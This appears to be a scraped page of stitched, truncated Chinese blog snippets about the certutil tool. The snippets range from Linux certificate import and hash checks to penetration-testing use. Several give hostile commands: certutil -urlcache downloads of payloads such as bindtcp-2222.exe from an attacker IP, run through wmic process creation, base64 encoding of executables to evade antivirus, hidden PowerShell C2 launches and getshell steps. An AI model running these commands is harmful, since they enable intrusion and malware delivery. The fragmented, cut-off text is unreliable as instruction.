在linux下使用GoAgent客户端的时候,需要导入CA.cer证书。...安装证书管理工具 apt-get install libnss3-tools 导入证书 $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n...GoAgent -i ~/programs/goagent/local/CA.crt 如果输出: certutil: function failed: security library: bad...$ mv ~/.pki/nssdb ~/.pki/nssdb.corrupted $ mkdir ~/.pki/nssdb $ chmod 700 ~/.pki/nssdb $ certutil -d.../goagent/local/CA.crt tips: 本文由wp2Blog导入,原文链接:http://devonios.com/certutil-%e5%af%bc%e5%85%a5-ca-%e8%
在linux下使用GoAgent客户端的时候,需要导入CA.cer证书。...安装证书管理工具 apt-get install libnss3-tools 导入证书 $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent...-i ~/programs/goagent/local/CA.crt 如果输出: certutil: function failed: security library: bad database....$ mv ~/.pki/nssdb ~/.pki/nssdb.corrupted $ mkdir ~/.pki/nssdb $ chmod 700 ~/.pki/nssdb $ certutil -d...sql:$HOME/.pki/nssdb -N 导入证书: $ certutil -d sql:$HOME/.pki/nssdb -A -t "C,," -n GoAgent -i ~/programs
使用介绍 certutil -?...参考至:https://xz.aliyun.com/t/9737 使用certutil下载文件会产生缓存,用如下命令查看: certutil -urlcache * 使用命令将当前的缓存删除: certutil...://192.168.22.104/crow.txt delete 2.2 hash验证 在linux下可以使用md5、md5sum等校验hash值 在Windows上就可以使用certutil来计算...: certutil -hashfile crow.txt MD5 //检验MD5 certutil -hashfile crow.txt SHA1 //检验SHA1 certutil -hashfile...certutil文件拷贝到当前目录,然后执行命令: where certutil copy C:\Windows\System32\certutil.exe crow.exe 再来执行命令试试: crow
Certutil.exe是一个命令行程序,作为证书服务的一部分安装。...C:\> certutil.exe -urlcache -split -f http://lyshark.com/lyshark.log C:\> certutil.exe -urlcache -split...编码后生成目标文件lyshark.bat C:\> certutil -encode lyshark.log lyshark.bat 输入长度 = 12 输出长度 = 74 CertUtil: -encode...C:\> certutil -decode lyshark.bat lyshark.log 输入长度 = 74 输出长度 = 12 CertUtil: -decode 命令成功完成。...Certutil.exe + -ping Argument Invoke-CradleCrafter\Memory> CERTUTIL [*] Name :
了解过certutil工具的师傅建议直接到0x02 0x01 关于certutil工具的介绍以及一些基础的用法 Certutil.exe是作为证书服务的一部分安装的命令行程序。...以上呢是微软官方对于Certutil.exe工具的使用介绍,不过现在Certutil.exe已经被黑客广泛利用于下载,编码解码等用途。所以现在他被杀的蛮死的。...-- 显示该用法消息 CertUtil -? -- 显示动词列表(命名列表) CertUtil -dump -?...Certutil.exe -urlcache * 如果不想生成缓存的话可以用 certutil & certutil -urlcache -split -f http://ip/xx.exe delete...如果用的是linux的话可以用下面这个命令将文本分割成想要的大小 split -b 1M xxx.txt output 这里我用python切割一下。
何为certutil certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。...这里我首先在命令行用certutil -?查看一下certutil所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。 ?...certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...另外一种方法就是使用windows自带的分隔符&和|,本质上跟第一种方法一样,相当于执行了两次certutil certutil & certutil -urlcache -split -f http:...使用certutil下载文件有个弊端就是会产生缓存文件,用如下命令查看: certutil -urlcache * ? 执行删除缓存 certutil -urlcache * delete ?
何为certutil certutil.exe 是一个合法Windows文件,用于管理Windows证书的程序。...这里我首先在命令行用certutil -?查看一下certutil所有的参数,这里只截图了一部分,接下来就总结一下最常用的几个关于certutil在内网渗透中的应用。...certutil下载文件 一般我最常使用的certutil的功能就是在cmd环境下下载文件,因为certutil是windows自带的exe,所以在使用的时候会比其他exe或者vbs更加方便。...hash进行比对,使用certutil也能够获取hash值 certutil -hashfile mimikatz.exe MD5 //检验MD5certutil -hashfile mimikatz.exe...:: powershell.exe spawns certutil.exe certutil.exe [*] Artifacts :: C:\Windows\Prefetch\CERTUTIL.EXE
最近发现使用certutil进行解码的office恶意软件,这种恶意软件通过OLE机制落地通过BASE64编码的恶意软件,然后通过调用certutil来进行解码恶意软件,并通过宏来启动恶意软件,这样做主要是为了绕过杀软的检测点...在拼接出以后开始调用 certutil.exe 进行对WORD,VRE进行解码。 ? 下图为WORD.VRE被编码的格式。 ?...certutil.exe 是微软自带的软件,阅读原文查看官方的介绍 其中的decode和encode可以实现对一个文件进行Base64的编码和解码。 ?
Linux (Linux) Linux distributions like Ubuntu, Debian, Mint, Kali, Fedora, CentOS, RedHat provides following...WinMD5 Free WinMD5免费 CertUtil 证书实用程序 … … 计算并验证MD5 (Calculate and Verify MD5) In this part, we will...Linux (Linux) For Linux distributions, we will use md5 command....tool named certutil ....在Windows中,我们将使用名为certutil命令行工具。 在这种情况下,我们将提供名为MD5的文件和哈希类型。 PS> certutil.exe -hashfile .
@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/bindtcp-2222.exe...@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe c:/webserver4444...print(wmi_exec) os.system(wmi_exec) if __name__ == '__main__': down() zx() 2、Linux...Linux Proxychains使用 安装使用:https://blog.csdn.net/qq_53086690/article/details/121779832 代理配置:Proxychains.conf...@#45’ -x ‘cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/webserver4444.exe &
Linux发邮件shell脚本与群发邮件shell脚本 说明:因为明天统计疫情健康打卡,需要通知同学完成打卡,最开始是一个人一个人的进行QQ通知,为了方便通知,我利用Linux写了一个shell定时群发邮件提醒脚本...,如果大家有需要的可以参考我的方式方法 下面我将我进行配置的方法分享给大家 1.Linux安装邮件服务 因为Linux默认没有安装mail邮件服务,我们将进行安装,输入安装命令等待几秒即可安装成功...-connect smtp.qq.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/.certs/qq.crt certutil...-A -n "GeoTrust SSL CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -A -n "GeoTrust Global CA"...-t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -L -d /root/.certs 注意:生成完成之后,修改 mail.rc 邮件配置,修改 nss-config-dir
相比大家也想让自己的Linux备份啊什么的存储起来 放到哪里最安全呢 相比来说放到自己QQ邮箱比放到自己电脑更安全一些 我们今天就来做一个实验 让你的Linux发邮件到你的mail中 我们今天需要一个软件...s_client -connect smtp.qq.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/.certs/qq.crt certutil...-A -n "GeoTrust SSL CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -A -n "GeoTrust Global CA"...-t "C,," -d ~/.certs -i ~/.certs/qq.crt certutil -L -d /root/.certs cd /root/.certs/ certutil -A -n "...验证成功以后就会给你一个授权码 其实我们要的是授权码 然后我们进Linux 打开刚才mail的配置文件 加入规则: vi /etc/mail.rc 进入以后我们加入规则 set smtp-use-starttls
Linux服务器运维过程中需要监控系统状况并自动报警,有时有邮件报警的需要,一般Linux发送报警邮件可以通过本地邮箱或外部邮箱服务器,这里用最简单的方法:利用mailx一个小型的邮件发送程序使用外部邮箱即可实现发送邮件功能...sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/.certs/qq.crt # 添加证书到数据库 [root@localhost ~]# certutil...-A -n "GeoTrust SSL CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt [root@localhost ~]# certutil -A -n "...GeoTrust Global CA" -t "C,," -d ~/.certs -i ~/.certs/qq.crt # 列出指定目录下的证书 [root@localhost ~]# certutil...Peer's certificate issuer is not recognized.”这样的证书没有获得认可的警告提示,需要执行下面指明受信任证书、防报错的命令 [root@localhost ~]# certutil
windows, macos 和 linux 平台的哈希校验方法汇总 简介 语法 windows 平台 macos 平台 linux 平台 测试 以字符串hello为例 将hello字符串保存在文件中...语法 常用的算法有 md5, sha-1 ,sha256. windows 平台 certutil -hashfile filename md5 certutil -hashfile filename...sha1 certutil -hashfile filename sha256 macos 平台 md5 filename shasum -a 1 filename shasum -a 256...echo 会直接在输出的字符串后面添加 '\n' echo -n "hello" | shasum -a 256 # 计算的为 "hello" 的哈希,-n 会阻止 echo 为字符串添加 '\n' linux...而linux系行尾用的只有换行符,即’\n’,也就是LF。因此,windows平台要想得到和linux平台一致的结果,首先要调整文件格式到unix格式。
免杀新伙伴-daybreak,这个工具是类似CS的工具 下面的图片是它的控制界面,利用了Web界面更加简介美观且自带中文 分析一下它自带的上线语句 支持多种操作系统的上线,相比CS需要按照插件才能上线linux...更加集成 支持利用powershell和certutil指令进行上线操作 powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden...自带的加解密功能进行木马的免杀 加密代码 Certutil -encode C+Powershell.exe out.txt C语言源码 #include #include <stdlib.h...+n.txt out.txt 最后利用 certutil -decode out.txt C2可执行文件名.exe 我们通过以下命令进行加密,产生txt文件 Certutil -encode C+...Powershell.exe out.txt 利用文本切割器,按照每500行一份进行切割 文本切割器网站 https://uutool.cn/txt-incise/ 我们将文本缝合后利用certutil
文章前言 在渗透过程中,通常会需要向目标主机传送一些文件,来达到权限提升、权限维持等目的,本篇文章主要介绍一些windows和Linux下常用的文件下载方式。...certutil.exe是一个命令行程序,作为证书服务的一部分安装,你可以使用Certutil.exe转储和显示证书颁发机构(CA)配置信息,配置证书服务,备份和还原CA组件,以及验证证书,密钥对和证书链...我们可以在cmd中输入以下命令来查看certutil的具体使用方法: certutil -? ?...在渗透测试过程中,我们可以借助certutil来实现远程下载文件到本地: certutil -urlcache -split -f http://192.168.174.1:1234/evil.txt...之后运行该hta文件即可(在实战中可以由CS来生成hta攻击文件,之后进行攻击反弹shell回来进行后渗透测试)~ Linux 编程语言 Perl Perl是目前很受欢迎的主流脚本语言,linux主机一般都自带
3、linux环境校验文件完整性 Linux下可以直接使用md5sum/sha1sum/sha256sum命令直接计算文件的对应校验值。...Hello.mp3 sha1sum/works/Hello.mp3 sha256sum/works/Hello.mp3 4、Windows环境校验文件完整性 Windows下可以使用Windows自带的certutil...certutil支持的算法有:MD2 MD4 MD5 SHA1SHA256 SHA384 SHA512。...certutil的使用方法:执行“certutil-hashfile 文件名 校验值类型”,即可计算出对应文件的校验值。...例如:certutil -hashfile C:\Hello.mp3MD5 ?
由于后面要写有关shell,所以先学习怎么发邮件 1.mailx mailx是Linux系统上用来处理邮件的工具,使用它可以发送,读取邮件 使用以下命令安装(发现好像系统自带了) yum -y...smtp.139.com:465 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /etc/pki/nssdb/139.crt $ certutil...-A -n "GeoTrust SSL CA" -t "C,," -d /etc/pki/nssdb/ -i /etc/pki/nssdb/139.crt $ certutil -A -n "GeoTrust...Global CA" -t "C,," -d /etc/pki/nssdb/ -i /etc/pki/nssdb/139.crt $ certutil -L -d /etc/pki/nssdb/ 进入
这里我们根据可能会遇到的多个场景进行了一些测试,如:Linux/Windows,出/不出网、有/无回显。...注:我们可以通过在网站前/后台的上传功能随便传一个文件,然后再利用Windows的for或Linux的while等命令来查找刚上传的文件,或网站下已存在的文件得到绝对路径,最后再写入文件即可,继续往下看.../shell.txt & certutil -decode %i/../shell.txt %i/...../shell.txt & certutil -decodehex %i/../shell.txt %i/.....Linux、Windows利用方式都一样,只是命令不一样,都是根据文件名、文件内容找绝对路径,常见文件写入、下载方式进行Getshell。
0x04 getshell 下马,上线 certutil -urlcache -split -f http://xx.xx.xx.xx/robots.txt C:\Users\admin\a.exe &...certutil 如果目标机器较老,很可能不存在powershell,此时就需要使用一些老方法,即certutil certutil绕过360的方式网上已经有了(记一次渗透测试后引发的小扩展), 这里再提一个...certutil编码解码。...windows不像linux,自带base64编码解码,但是 certutil 可以 certutil -encode x.exe x.txt certutil -decode x.txt x.exe...通过编码指令将exe编码生成txt文件,然后通过 echo 写入,再调用 certutil 解码还原为PE文件 ?
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
即时通信 IM
实时音视频
